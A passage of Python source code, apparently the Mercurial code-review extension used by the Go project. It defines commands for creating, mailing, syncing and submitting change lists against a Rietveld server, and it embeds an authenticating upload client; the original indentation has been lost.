A change list is a group of files to be reviewed and submitted together,
plus a textual description of the change.
Change lists are referred to by simple alphanumeric names.
Changes must be reviewed before they can be submitted.
In the absence of options, the change command opens the
change list for editing in the default editor.
Deleting a change with the -d or -D flag does not affect
the contents of the files listed in that change. To revert
the files listed in a change, use
hg revert @123456
before running hg change -d 123456.
"""
dirty = {}
if len(pats) > 0 and GoodCLName(pats[0]):
name = pats[0]
if len(pats) != 1:
return "cannot specify CL name and file patterns"
pats = pats[1:]
cl, err = LoadCL(ui, repo, name, web=True)
if err != '':
return err
if not cl.local and (opts["stdin"] or not opts["stdout"]):
return "cannot change non-local CL " + name
else:
name = "new"
cl = CL("new")
dirty[cl] = True
files = ChangedFiles(ui, repo, pats, opts)
taken = TakenFiles(ui, repo)
files = Sub(files, taken)
if opts["delete"] or opts["deletelocal"]:
if opts["delete"] and opts["deletelocal"]:
return "cannot use -d and -D together"
flag = "-d"
if opts["deletelocal"]:
flag = "-D"
if name == "new":
return "cannot use "+flag+" with file patterns"
if opts["stdin"] or opts["stdout"]:
return "cannot use "+flag+" with -i or -o"
if not cl.local:
return "cannot change non-local CL " + name
if opts["delete"]:
if cl.original_author:
return "original author must delete CL; hg change -D will remove locally"
PostMessage(ui, cl.name, "*** Abandoned ***", send_mail="checked")
EditDesc(cl.name, closed="checked")
cl.Delete(ui, repo)
return
if opts["stdin"]:
s = sys.stdin.read()
clx, line, err = ParseCL(s, name)
if err != '':
return "error parsing change list: line %d: %s" % (line, err)
if clx.desc is not None:
cl.desc = clx.desc;
dirty[cl] = True
if clx.reviewer is not None:
cl.reviewer = clx.reviewer
dirty[cl] = True
if clx.cc is not None:
cl.cc = clx.cc
dirty[cl] = True
if clx.files is not None:
cl.files = clx.files
dirty[cl] = True
if not opts["stdin"] and not opts["stdout"]:
if name == "new":
cl.files = files
err = EditCL(ui, repo, cl)
if err != "":
return err
dirty[cl] = True
for d, _ in dirty.items():
d.Flush(ui, repo)
if opts["stdout"]:
ui.write(cl.EditorText())
elif name == "new":
if ui.quiet:
ui.write(cl.name)
else:
ui.write("CL created: " + cl.url + "\n")
return
def code_login(ui, repo, **opts):
"""log in to code review server
Logs in to the code review server, saving a cookie in
a file in your home directory.
"""
MySend(None)
def clpatch(ui, repo, clname, **opts):
"""import a patch from the code review server
Imports a patch from the code review server into the local client.
If the local client has already modified any of the files that the
patch modifies, this command will refuse to apply the patch.
Submitting an imported patch will keep the original author's
name as the Author: line but add your own name to a Committer: line.
"""
cl, patch, err = DownloadCL(ui, repo, clname)
argv = ["hgpatch"]
if opts["no_incoming"]:
argv += ["--checksync=false"]
if err != "":
return err
try:
cmd = subprocess.Popen(argv, shell=False, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=None, close_fds=True)
except:
return "hgpatch: " + ExceptionDetail()
if os.fork() == 0:
cmd.stdin.write(patch)
os._exit(0)
cmd.stdin.close()
out = cmd.stdout.read()
if cmd.wait() != 0:
return "hgpatch failed"
cl.local = True
cl.files = out.strip().split()
files = ChangedFiles(ui, repo, [], opts)
extra = Sub(cl.files, files)
if extra:
ui.warn("warning: these files were listed in the patch but not changed:\n\t" + "\n\t".join(extra) + "\n")
cl.Flush(ui, repo)
ui.write(cl.PendingText() + "\n")
def download(ui, repo, clname, **opts):
"""download a change from the code review server
Download prints a description of the given change list
followed by its diff, downloaded from the code review server.
"""
cl, patch, err = DownloadCL(ui, repo, clname)
if err != "":
return err
ui.write(cl.EditorText() + "\n")
ui.write(patch + "\n")
return
def file(ui, repo, clname, pat, *pats, **opts):
"""assign files to or remove files from a change list
Assign files to or (with -d) remove files from a change list.
The -d option only removes files from the change list.
It does not edit them or remove them from the repository.
"""
pats = tuple([pat] + list(pats))
if not GoodCLName(clname):
return "invalid CL name " + clname
dirty = {}
cl, err = LoadCL(ui, repo, clname, web=False)
if err != '':
return err
if not cl.local:
return "cannot change non-local CL " + clname
files = ChangedFiles(ui, repo, pats, opts)
if opts["delete"]:
oldfiles = Intersect(files, cl.files)
if oldfiles:
if not ui.quiet:
ui.status("# Removing files from CL. To undo:\n")
ui.status("# cd %s\n" % (repo.root))
for f in oldfiles:
ui.status("# hg file %s %s\n" % (cl.name, f))
cl.files = Sub(cl.files, oldfiles)
cl.Flush(ui, repo)
else:
ui.status("no such files in CL")
return
if not files:
return "no such modified files"
files = Sub(files, cl.files)
taken = Taken(ui, repo)
warned = False
for f in files:
if f in taken:
if not warned and not ui.quiet:
ui.status("# Taking files from other CLs. To undo:\n")
ui.status("# cd %s\n" % (repo.root))
warned = True
ocl = taken[f]
if not ui.quiet:
ui.status("# hg file %s %s\n" % (ocl.name, f))
if ocl not in dirty:
ocl.files = Sub(ocl.files, files)
dirty[ocl] = True
cl.files = Add(cl.files, files)
dirty[cl] = True
for d, _ in dirty.items():
d.Flush(ui, repo)
return
def gofmt(ui, repo, *pats, **opts):
"""apply gofmt to modified files
Applies gofmt to the modified files in the repository that match
the given patterns.
"""
files = ChangedExistingFiles(ui, repo, pats, opts)
files = [f for f in files if f.endswith(".go")]
if not files:
return "no modified go files"
cwd = os.getcwd()
files = [RelativePath(repo.root + '/' + f, cwd) for f in files]
try:
cmd = ["gofmt", "-l"]
if not opts["list"]:
cmd += ["-w"]
if os.spawnvp(os.P_WAIT, "gofmt", cmd + files) != 0:
raise util.Abort("gofmt did not exit cleanly")
except error.Abort, e:
raise
except:
raise util.Abort("gofmt: " + ExceptionDetail())
return
def mail(ui, repo, *pats, **opts):
"""mail a change for review
Uploads a patch to the code review server and then sends mail
to the reviewer and CC list asking for a review.
"""
cl, err = CommandLineCL(ui, repo, pats, opts)
if err != "":
return err
cl.Upload(ui, repo, gofmt_just_warn=True)
if not cl.reviewer:
return "no reviewers listed in CL"
pmsg = "Hello " + JoinComma(cl.reviewer)
if cl.cc:
pmsg += " (cc: %s)" % (', '.join(cl.cc),)
pmsg += ",\n"
pmsg += "\n"
pmsg += "I'd like you to review the following change.\n"
PostMessage(ui, cl.name, pmsg, send_mail="checked", subject=cl.Subject())
def nocommit(ui, repo, *pats, **opts):
"""(disabled when using this extension)"""
return "The codereview extension is enabled; do not use commit."
def pending(ui, repo, *pats, **opts):
"""show pending changes
Lists pending changes followed by a list of unassigned but modified files.
"""
m = LoadAllCL(ui, repo, web=True)
names = m.keys()
names.sort()
for name in names:
cl = m[name]
ui.write(cl.PendingText() + "\n")
files = DefaultFiles(ui, repo, [], opts)
if len(files) > 0:
s = "Changed files not in any CL:\n"
for f in files:
s += "\t" + f + "\n"
ui.write(s)
def reposetup(ui, repo):
global original_match
if original_match is None:
original_match = cmdutil.match
cmdutil.match = ReplacementForCmdutilMatch
RietveldSetup(ui, repo)
def CheckContributor(ui, repo, user=None):
if not user:
user = ui.config("ui", "username")
if not user:
raise util.Abort("[ui] username is not configured in .hgrc")
_, userline = FindContributor(ui, repo, user, warn=False)
if not userline:
raise util.Abort("cannot find %s in CONTRIBUTORS" % (user,))
return userline
def FindContributor(ui, repo, user, warn=True):
try:
f = open(repo.root + '/CONTRIBUTORS', 'r')
except:
raise util.Abort("cannot open %s: %s" % (repo.root+'/CONTRIBUTORS', ExceptionDetail()))
for line in f.readlines():
line = line.rstrip()
if line.startswith('#'):
continue
match = re.match(r"(.*) <(.*)>", line)
if not match:
continue
if line == user or match.group(2) == user:
return match.group(2), line
if warn:
ui.warn("warning: cannot find %s in CONTRIBUTORS\n" % (user,))
return None, None
def submit(ui, repo, *pats, **opts):
"""submit change to remote repository
Submits change to remote repository.
Bails out if the local repository is not in sync with the remote one.
"""
repo.ui.quiet = True
if not opts["no_incoming"] and Incoming(ui, repo, opts):
return "local repository out of date; must sync before submit"
cl, err = CommandLineCL(ui, repo, pats, opts)
if err != "":
return err
user = None
if cl.original_author:
user = cl.original_author
userline = CheckContributor(ui, repo, user)
about = ""
if cl.reviewer:
about += "R=" + JoinComma([CutDomain(s) for s in cl.reviewer]) + "\n"
if opts.get('tbr'):
tbr = SplitCommaSpace(opts.get('tbr'))
cl.reviewer = Add(cl.reviewer, tbr)
about += "TBR=" + JoinComma([CutDomain(s) for s in tbr]) + "\n"
if cl.cc:
about += "CC=" + JoinComma([CutDomain(s) for s in cl.cc]) + "\n"
if not cl.reviewer:
return "no reviewers listed in CL"
if not cl.local:
return "cannot submit non-local CL"
# upload, to sync current patch and also get change number if CL is new.
if not cl.original_author:
cl.Upload(ui, repo, gofmt_just_warn=True)
# check gofmt for real; allowed upload to warn in order to save CL.
cl.Flush(ui, repo)
CheckGofmt(ui, repo, cl.files)
about += "%s%s\n" % (server_url_base, cl.name)
if cl.original_author:
about += "\nCommitter: " + CheckContributor(ui, repo, None) + "\n"
# submit changes locally
date = opts.get('date')
if date:
opts['date'] = util.parsedate(date)
opts['message'] = cl.desc.rstrip() + "\n\n" + about
if opts['dryrun']:
print "NOT SUBMITTING:"
print "User: ", userline
print "Message:"
print Indent(opts['message'], "\t")
print "Files:"
print Indent('\n'.join(cl.files), "\t")
return "dry run; not submitted"
m = match.exact(repo.root, repo.getcwd(), cl.files)
node = repo.commit(opts['message'], userline, opts.get('date'), m)
if not node:
return "nothing changed"
log = repo.changelog
rev = log.rev(node)
parents = log.parentrevs(rev)
if (rev-1 not in parents and
(parents == (nullrev, nullrev) or
len(log.heads(log.node(parents[0]))) > 1 and
(parents[1] == nullrev or len(log.heads(log.node(parents[1]))) > 1))):
repo.rollback()
return "local repository out of date (created new head); must sync before submit"
# push changes to remote.
# if it works, we're committed.
# if not, roll back
other = getremote(ui, repo, opts)
r = repo.push(other, False, None)
if r == 0:
repo.rollback()
return "local repository out of date; must sync before submit"
# we're committed. upload final patch, close review, add commit message
changeURL = short(node)
url = other.url()
m = re.match("^https?://([^@/]+@)?([^.]+)\.googlecode\.com/hg/", url)
if m:
changeURL = "http://code.google.com/p/%s/source/detail?r=%s" % (m.group(2), changeURL)
else:
print >>sys.stderr, "URL: ", url
pmsg = "*** Submitted as " + changeURL + " ***\n\n" + opts['message']
PostMessage(ui, cl.name, pmsg, send_mail="checked")
if not cl.original_author:
EditDesc(cl.name, closed="checked")
cl.Delete(ui, repo)
def sync(ui, repo, **opts):
"""synchronize with remote repository
Incorporates recent changes from the remote repository
into the local repository.
"""
if not opts["local"]:
ui.status = sync_note
ui.note = sync_note
other = getremote(ui, repo, opts)
modheads = repo.pull(other)
err = commands.postincoming(ui, repo, modheads, True, "tip")
if err:
return err
sync_changes(ui, repo)
def sync_note(msg):
# we run sync (pull -u) in verbose mode to get the
# list of files being updated, but that drags along
# a bunch of messages we don't care about.
# omit them.
if msg == 'resolving manifests\n':
return
if msg == 'searching for changes\n':
return
if msg == "couldn't find merge tool hgmerge\n":
return
sys.stdout.write(msg)
def sync_changes(ui, repo):
# Look through recent change log descriptions to find
# potential references to http://.*/our-CL-number.
# Double-check them by looking at the Rietveld log.
get = util.cachefunc(lambda r: repo[r].changeset())
changeiter, matchfn = cmdutil.walkchangerevs(ui, repo, [], get, {'rev': None})
n = 0
for st, rev, fns in changeiter:
if st != 'iter':
continue
n += 1
if n > 100:
break
desc = repo[rev].description().strip()
for clname in re.findall('(?m)^http://(?:[^\n]+)/([0-9]+)$', desc):
if IsLocalCL(ui, repo, clname) and IsRietveldSubmitted(ui, clname, repo[rev].hex()):
ui.warn("CL %s submitted as %s; closing\n" % (clname, repo[rev]))
cl, err = LoadCL(ui, repo, clname, web=False)
if err != "":
ui.warn("loading CL %s: %s\n" % (clname, err))
continue
EditDesc(cl.name, closed="checked")
cl.Delete(ui, repo)
# Remove files that are not modified from the CLs in which they appear.
all = LoadAllCL(ui, repo, web=False)
changed = ChangedFiles(ui, repo, [], {})
for _, cl in all.items():
extra = Sub(cl.files, changed)
if extra:
ui.warn("Removing unmodified files from CL %s:\n" % (cl.name,))
for f in extra:
ui.warn("\t%s\n" % (f,))
cl.files = Sub(cl.files, extra)
cl.Flush(ui, repo)
if not cl.files:
ui.warn("CL %s has no files; suggest hg change -d %s\n" % (cl.name, cl.name))
return
def uisetup(ui):
if "^commit|ci" in commands.table:
commands.table["^commit|ci"] = (nocommit, [], "")
def upload(ui, repo, name, **opts):
"""upload diffs to the code review server
Uploads the current modifications for a given change to the server.
"""
repo.ui.quiet = True
cl, err = LoadCL(ui, repo, name, web=True)
if err != "":
return err
if not cl.local:
return "cannot upload non-local change"
cl.Upload(ui, repo)
print "%s%s\n" % (server_url_base, cl.name)
return
review_opts = [
('r', 'reviewer', '', 'add reviewer'),
('', 'cc', '', 'add cc'),
('', 'tbr', '', 'add future reviewer'),
('m', 'message', '', 'change description (for new change)'),
]
cmdtable = {
# The ^ means to show this command in the help text that
# is printed when running hg with no arguments.
"^change": (
change,
[
('d', 'delete', None, 'delete existing change list'),
('D', 'deletelocal', None, 'delete locally, but do not change CL on server'),
('i', 'stdin', None, 'read change list from standard input'),
('o', 'stdout', None, 'print change list to standard output'),
],
"[-d | -D] [-i] [-o] change# or FILE ..."
),
"^clpatch": (
clpatch,
[
('', 'no_incoming', None, 'disable check for incoming changes'),
],
"change#"
),
# Would prefer to call this codereview-login, but then
# hg help codereview prints the help for this command
# instead of the help for the extension.
"code-login": (
code_login,
[],
"",
),
"commit|ci": (
nocommit,
[],
"",
),
"^download": (
download,
[],
"change#"
),
"^file": (
file,
[
('d', 'delete', None, 'delete files from change list (but not repository)'),
],
"[-d] change# FILE ..."
),
"^gofmt": (
gofmt,
[
('l', 'list', None, 'list files that would change, but do not edit them'),
],
"FILE ..."
),
"^pending|p": (
pending,
[],
"[FILE ...]"
),
"^mail": (
mail,
review_opts + [
] + commands.walkopts,
"[-r reviewer] [--cc cc] [change# | file ...]"
),
"^submit": (
submit,
review_opts + [
('', 'no_incoming', None, 'disable initial incoming check (for testing)'),
('n', 'dryrun', None, 'make change only locally (for testing)'),
] + commands.walkopts + commands.commitopts + commands.commitopts2,
"[-r reviewer] [--cc cc] [change# | file ...]"
),
"^sync": (
sync,
[
('', 'local', None, 'do not pull changes from remote repository')
],
"[--local]",
),
"^upload": (
upload,
[],
"change#"
),
}
#######################################################################
# Wrappers around upload.py for interacting with Rietveld
emptydiff = """Index: ~rietveld~placeholder~
===================================================================
diff --git a/~rietveld~placeholder~ b/~rietveld~placeholder~
new file mode 100644
"""
# HTML form parser
class FormParser(HTMLParser):
def __init__(self):
self.map = {}
self.curtag = None
self.curdata = None
HTMLParser.__init__(self)
def handle_starttag(self, tag, attrs):
if tag == "input":
key = None
value = ''
for a in attrs:
if a[0] == 'name':
key = a[1]
if a[0] == 'value':
value = a[1]
if key is not None:
self.map[key] = value
if tag == "textarea":
key = None
for a in attrs:
if a[0] == 'name':
key = a[1]
if key is not None:
self.curtag = key
self.curdata = ''
def handle_endtag(self, tag):
if tag == "textarea" and self.curtag is not None:
self.map[self.curtag] = self.curdata
self.curtag = None
self.curdata = None
def handle_charref(self, name):
self.handle_data(unichr(int(name)))
def handle_entityref(self, name):
import htmlentitydefs
if name in htmlentitydefs.entitydefs:
self.handle_data(htmlentitydefs.entitydefs[name])
else:
self.handle_data("&" + name + ";")
def handle_data(self, data):
if self.curdata is not None:
self.curdata += data
# XML parser
def XMLGet(ui, path):
try:
data = MySend(path, force_auth=False);
except:
ui.warn("XMLGet %s: %s\n" % (path, ExceptionDetail()))
return None
return ET.XML(data)
def IsRietveldSubmitted(ui, clname, hex):
feed = XMLGet(ui, "/rss/issue/" + clname)
if feed is None:
return False
for sum in feed.findall("{http://www.w3.org/2005/Atom}entry/{http://www.w3.org/2005/Atom}summary"):
text = sum.findtext("", None).strip()
m = re.match('\*\*\* Submitted as [^*]*?([0-9a-f]+) \*\*\*', text)
if m is not None and len(m.group(1)) >= 8 and hex.startswith(m.group(1)):
return True
return False
def DownloadCL(ui, repo, clname):
cl, err = LoadCL(ui, repo, clname)
if err != "":
return None, None, "error loading CL %s: %s" % (clname, ExceptionDetail())
# Grab RSS feed to learn about CL
feed = XMLGet(ui, "/rss/issue/" + clname)
if feed is None:
return None, None, "cannot download CL"
# Find most recent diff
diff = None
prefix = 'http://' + server + '/'
for link in feed.findall("{http://www.w3.org/2005/Atom}entry/{http://www.w3.org/2005/Atom}link"):
if link.get('rel') != 'alternate':
continue
text = link.get('href')
if not text.startswith(prefix) or not text.endswith('.diff'):
continue
diff = text[len(prefix)-1:]
if diff is None:
return None, None, "CL has no diff"
diffdata = MySend(diff, force_auth=False)
# Find author - first entry will be author who created CL.
nick = None
for author in feed.findall("{http://www.w3.org/2005/Atom}entry/{http://www.w3.org/2005/Atom}author/{http://www.w3.org/2005/Atom}name"):
nick = author.findtext("", None).strip()
break
if not nick:
return None, None, "CL has no author"
# The author is just a nickname: get the real email address.
try:
data = MySend("/user_popup/" + nick, force_auth=False)
except:
ui.warn("error looking up %s: %s\n" % (nick, ExceptionDetail()))
cl.original_author = nick+"@needtofix"
return cl, diffdata, ""
match = re.match(r"<b>(.*) \((.*)\)</b>", data)
if not match:
return None, None, "error looking up %s: cannot parse result %s" % (nick, repr(data))
if match.group(1) != nick and match.group(2) != nick:
return None, None, "error looking up %s: got info for %s, %s" % (nick, match.group(1), match.group(2))
email = match.group(1)
# Temporary hack until we move to the public code review server.
email1, _ = FindContributor(ui, repo, email, warn=False)
if email1 == "":
email = re.sub("@google.com$", "@golang.org", email)
# Print warning if email is not in CONTRIBUTORS file.
FindContributor(ui, repo, email)
cl.original_author = email
return cl, diffdata, ""
# Like upload.py Send but only authenticates when the
# redirect is to www.google.com/accounts. This keeps
# unnecessary redirects from happening during testing.
def MySend(request_path, payload=None,
content_type="application/octet-stream",
timeout=None, force_auth=True,
**kwargs):
"""Sends an RPC and returns the response.
Args:
request_path: The path to send the request to, eg /api/appversion/create.
payload: The body of the request, or None to send an empty request.
content_type: The Content-Type header to use.
timeout: timeout in seconds; default None i.e. no timeout.
(Note: for large requests on OS X, the timeout doesn't work right.)
kwargs: Any keyword arguments are converted into query string parameters.
Returns:
The response body, as a string.
"""
# TODO: Don't require authentication. Let the server say
# whether it is necessary.
global rpc
if rpc == None:
rpc = GetRpcServer(upload_options)
self = rpc
if not self.authenticated and force_auth:
self._Authenticate()
if request_path is None:
return
old_timeout = socket.getdefaulttimeout()
socket.setdefaulttimeout(timeout)
try:
tries = 0
while True:
tries += 1
args = dict(kwargs)
url = "http://%s%s" % (self.host, request_path)
if args:
url += "?" + urllib.urlencode(args)
req = self._CreateRequest(url=url, data=payload)
req.add_header("Content-Type", content_type)
try:
f = self.opener.open(req)
response = f.read()
f.close()
return response
except urllib2.HTTPError, e:
if tries > 3:
raise
elif e.code == 401:
self._Authenticate()
elif e.code == 302:
loc = e.info()["location"]
if not loc.startswith('https://www.google.com/a') or loc.find('/ServiceLogin') < 0:
return ''
self._Authenticate()
else:
raise
finally:
socket.setdefaulttimeout(old_timeout)
def GetForm(url):
f = FormParser()
f.feed(MySend(url))
f.close()
for k,v in f.map.items():
f.map[k] = v.replace("\r\n", "\n");
return f.map
# Fetch the settings for the CL, like reviewer and CC list, by
# scraping the Rietveld editing forms.
def GetSettings(issue):
# The /issue/edit page has everything but only the
# CL owner is allowed to fetch it (and submit it).
f = None
try:
f = GetForm("/" + issue + "/edit")
except:
pass
if not f or 'reviewers' not in f:
# Maybe we're not the CL owner. Fall back to the
# /publish page, which has the reviewer and CC lists,
# and then fetch the description separately.
f = GetForm("/" + issue + "/publish")
f['description'] = MySend("/"+issue+"/description", force_auth=False)
return f
def CreateIssue(subject, desc):
form_fields = [
("content_upload", "1"),
# ("user", upload_options.email),
("reviewers", ''),
("cc", ''),
("description", desc),
("base_hashes", ""),
("subject", subject),
]
uploaded_diff_file = [
("data", "data.diff", emptydiff),
]
ctype, body = EncodeMultipartFormData(form_fields, uploaded_diff_file)
response = MySend("/upload", body, content_type=ctype)
if response != "":
print >>sys.stderr, "Error creating issue:\n" + response
sys.exit(2)
def EditDesc(issue, subject=None, desc=None, reviewers=None, cc=None, closed=None):
form_fields = GetForm("/" + issue + "/edit")
if subject is not None:
form_fields['subject'] = subject
if desc is not None:
form_fields['description'] = desc
if reviewers is not None:
form_fields['reviewers'] = reviewers
if cc is not None:
form_fields['cc'] = cc
if closed is not None:
form_fields['closed'] = closed
ctype, body = EncodeMultipartFormData(form_fields.items(), [])
response = MySend("/" + issue + "/edit", body, content_type=ctype)
if response != "":
print >>sys.stderr, "Error editing description:\n" + "Sent form: \n", form_fields, "\n", response
sys.exit(2)
def PostMessage1(issue, message, reviewers=None, cc=None, send_mail=None, subject=None):
form_fields = GetForm("/" + issue + "/publish")
if reviewers is not None:
form_fields['reviewers'] = reviewers
if cc is not None:
form_fields['cc'] = cc
if send_mail is not None:
form_fields['send_mail'] = send_mail
if subject is not None:
form_fields['subject'] = subject
form_fields['message'] = message
form_fields['message_only'] = '1'
ctype, body = EncodeMultipartFormData(form_fields.items(), [])
response = MySend("/" + issue + "/publish", body, content_type=ctype)
if response != "":
print response
sys.exit(2)
def PostMessage(ui, issue, message, reviewers=None, cc=None, send_mail=None, subject=None):
# When Rietveld is busy, it seems to throw off a lot of HTTP Error 500: Internal Server Error.
# Rather than abort, sleep and try again.
# Even if the second time fails, let the overall hg command keep going.
try:
PostMessage1(issue, message, reviewers, cc, send_mail, subject)
return
except:
pass
ui.warn("error posting to "+server+" log; sleep 2 and try again.")
os.sleep(2)
try:
PostMessage1(issue, message, reviewers, cc, send_mail, subject)
return
except:
pass
ui.warn("error posting to "+server+" twice; log not updated.")
class opt(object):
pass
def RietveldSetup(ui, repo):
global upload_options, rpc, server, server_url_base, force_google_account, verbosity
# TODO(rsc): If the repository config has no codereview section,
# do not enable the extension. This allows users to
# put the extension in their global .hgrc but only
# enable it for some repositories.
# if not ui.has_section("codereview"):
# cmdtable = {}
# return
if not ui.verbose:
verbosity = 0
# Config options.
x = ui.config("codereview", "server")
if x is not None:
server = x
# TODO(rsc): Take from ui.username?
email = None
x = ui.config("codereview", "email")
if x is not None:
email = x
cc = None
x = ui.config("codereview", "cc")
if x is not None:
cc = x
server_url_base = "http://" + server + "/"
testing = ui.config("codereview", "testing")
force_google_account = ui.configbool("codereview", "force_google_account", False)
upload_options = opt()
upload_options.email = email
upload_options.host = None
upload_options.verbose = 0
upload_options.description = None
upload_options.description_file = None
upload_options.reviewers = None
upload_options.cc = cc
upload_options.message = None
upload_options.issue = None
upload_options.download_base = False
upload_options.revision = None
upload_options.send_mail = False
upload_options.vcs = None
upload_options.server = server
upload_options.save_cookies = True
if testing:
upload_options.save_cookies = False
upload_options.email = "test@example.com"
rpc = None
#######################################################################
# We keep a full copy of upload.py here to avoid import path hell.
# It would be nice if hg added the hg repository root
# to the default PYTHONPATH.
# Edit .+2,<hget http://codereview.appspot.com/static/upload.py
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tool for uploading diffs from a version control system to the codereview app.
Usage summary: upload.py [options] [-- diff_options]
Diff options are passed to the diff command of the underlying system.
Supported version control systems:
Git
Mercurial
Subversion
It is important for Git/Mercurial users to specify a tree/node/branch to diff
against by using the '--rev' option.
"""
# This code is derived from appcfg.py in the App Engine SDK (open source),
# and from ASPN recipe #146306.
import cookielib
import getpass
import logging
import mimetypes
import optparse
import os
import re
import socket
import subprocess
import sys
import urllib
import urllib2
import urlparse
# The md5 module was deprecated in Python 2.5.
try:
from hashlib import md5
except ImportError:
from md5 import md5
try:
import readline
except ImportError:
pass
# The logging verbosity:
# 0: Errors only.
# 1: Status messages.
# 2: Info logs.
# 3: Debug logs.
verbosity = 1
# Max size of patch or base file.
MAX_UPLOAD_SIZE = 900 * 1024
# Constants for version control names. Used by GuessVCSName.
VCS_GIT = "Git"
VCS_MERCURIAL = "Mercurial"
VCS_SUBVERSION = "Subversion"
VCS_UNKNOWN = "Unknown"
# whitelist for non-binary filetypes which do not start with "text/"
# .mm (Objective-C) shows up as application/x-freemind on my Linux box.
TEXT_MIMETYPES = ['application/javascript', 'application/x-javascript',
'application/x-freemind']
VCS_ABBREVIATIONS = {
VCS_MERCURIAL.lower(): VCS_MERCURIAL,
"hg": VCS_MERCURIAL,
VCS_SUBVERSION.lower(): VCS_SUBVERSION,
"svn": VCS_SUBVERSION,
VCS_GIT.lower(): VCS_GIT,
}
def GetEmail(prompt):
"""Prompts the user for their email address and returns it.
The last used email address is saved to a file and offered up as a suggestion
to the user. If the user presses enter without typing in anything the last
used email address is used. If the user enters a new address, it is saved
for next time we prompt.
"""
last_email_file_name = os.path.expanduser("~/.last_codereview_email_address")
last_email = ""
if os.path.exists(last_email_file_name):
try:
last_email_file = open(last_email_file_name, "r")
last_email = last_email_file.readline().strip("\n")
last_email_file.close()
prompt += " [%s]" % last_email
except IOError, e:
pass
email = raw_input(prompt + ": ").strip()
if email:
try:
last_email_file = open(last_email_file_name, "w")
last_email_file.write(email)
last_email_file.close()
except IOError, e:
pass
else:
email = last_email
return email
def StatusUpdate(msg):
"""Print a status message to stdout.
If 'verbosity' is greater than 0, print the message.
Args:
msg: The string to print.
"""
if verbosity > 0:
print msg
def ErrorExit(msg):
"""Print an error message to stderr and exit."""
print >>sys.stderr, msg
sys.exit(1)
class ClientLoginError(urllib2.HTTPError):
"""Raised to indicate there was an error authenticating with ClientLogin."""
def __init__(self, url, code, msg, headers, args):
urllib2.HTTPError.__init__(self, url, code, msg, headers, None)
self.args = args
self.reason = args["Error"]
class AbstractRpcServer(object):
"""Provides a common interface for a simple RPC server."""
def __init__(self, host, auth_function, host_override=None, extra_headers={},
save_cookies=False):
"""Creates a new HttpRpcServer.
Args:
host: The host to send requests to.
auth_function: A function that takes no arguments and returns an
(email, password) tuple when called. Will be called if authentication
is required.
host_override: The host header to send to the server (defaults to host).
extra_headers: A dict of extra headers to append to every request.
save_cookies: If True, save the authentication cookies to local disk.
If False, use an in-memory cookiejar instead. Subclasses must
implement this functionality. Defaults to False.
"""
self.host = host
self.host_override = host_override
self.auth_function = auth_function
self.authenticated = False
self.extra_headers = extra_headers
self.save_cookies = save_cookies
self.opener = self._GetOpener()
if self.host_override:
logging.info("Server: %s; Host: %s", self.host, self.host_override)
else:
logging.info("Server: %s", self.host)
def _GetOpener(self):
"""Returns an OpenerDirector for making HTTP requests.
Returns:
A urllib2.OpenerDirector object.
"""
raise NotImplementedError()
def _CreateRequest(self, url, data=None):
"""Creates a new urllib request."""
logging.debug("Creating request for: '%s' with payload:\n%s", url, data)
req = urllib2.Request(url, data=data)
if self.host_override:
req.add_header("Host", self.host_override)
for key, value in self.extra_headers.iteritems():
req.add_header(key, value)
return req
def _GetAuthToken(self, email, password):
"""Uses ClientLogin to authenticate the user, returning an auth token.
Args:
email: The user's email address
password: The user's password
Raises:
ClientLoginError: If there was an error authenticating with ClientLogin.
HTTPError: If there was some other form of HTTP error.
Returns:
The authentication token returned by ClientLogin.
"""
account_type = "GOOGLE"
if self.host.endswith(".google.com") and not force_google_account:
# Needed for use inside Google.
account_type = "HOSTED"
req = self._CreateRequest(
url="https://www.google.com/accounts/ClientLogin",
data=urllib.urlencode({
"Email": email,
"Passwd": password,
"service": "ah",
"source": "rietveld-codereview-upload",
"accountType": account_type,
}),
)
try:
response = self.opener.open(req)
response_body = response.read()
response_dict = dict(x.split("=")
for x in response_body.split("\n") if x)
return response_dict["Auth"]
except urllib2.HTTPError, e:
if e.code == 403:
body = e.read()
response_dict = dict(x.split("=", 1) for x in body.split("\n") if x)
raise ClientLoginError(req.get_full_url(), e.code, e.msg,
e.headers, response_dict)
else:
raise
def _GetAuthCookie(self, auth_token):
"""Fetches authentication cookies for an authentication token.
Args:
auth_token: The authentication token returned by ClientLogin.
Raises:
HTTPError: If there was an error fetching the authentication cookies.
"""
# This is a dummy value to allow us to identify when we're successful.
continue_location = "http://localhost/"
args = {"continue": continue_location, "auth": auth_token}
req = self._CreateRequest("http://%s/_ah/login?%s" %
(self.host, urllib.urlencode(args)))
try:
response = self.opener.open(req)
except urllib2.HTTPError, e:
response = e
if (response.code != 302 or
response.info()["location"] != continue_location):
raise urllib2.HTTPError(req.get_full_url(), response.code, response.msg,
response.headers, response.fp)
self.authenticated = True
def _Authenticate(self):
"""Authenticates the user.
The authentication process works as follows:
1) We get a username and password from the user
2) We use ClientLogin to obtain an AUTH token for the user
(see http://code.google.com/apis/accounts/AuthForInstalledApps.html).
3) We pass the auth token to /_ah/login on the server to obtain an
authentication cookie. If login was successful, it tries to redirect
us to the URL we provided.
If we attempt to access the upload API without first obtaining an
authentication cookie, it returns a 401 response (or a 302) and
directs us to authenticate ourselves with ClientLogin.
"""
for i in range(3):
credentials = self.auth_function()
try:
auth_token = self._GetAuthToken(credentials[0], credentials[1])
except ClientLoginError, e:
if e.reason == "BadAuthentication":
print >>sys.stderr, "Invalid username or password."
continue
if e.reason == "CaptchaRequired":
print >>sys.stderr, (
"Please go to\n"
"https://www.google.com/accounts/DisplayUnlockCaptcha\n"
"and verify you are a human. Then try again.")
break
if e.reason == "NotVerified":
print >>sys.stderr, "Account not verified."
break
if e.reason == "TermsNotAgreed":
print >>sys.stderr, "User has not agreed to TOS."
break
if e.reason == "AccountDeleted":
print >>sys.stderr, "The user account has been deleted."
break
if e.reason == "AccountDisabled":
print >>sys.stderr, "The user account has been disabled."
break
if e.reason == "ServiceDisabled":
print >>sys.stderr, ("The user's access to the service has been "
"disabled.")
break
if e.reason == "ServiceUnavailable":
print >>sys.stderr, "The service is not available; try again later."
break
raise
self._GetAuthCookie(auth_token)
return
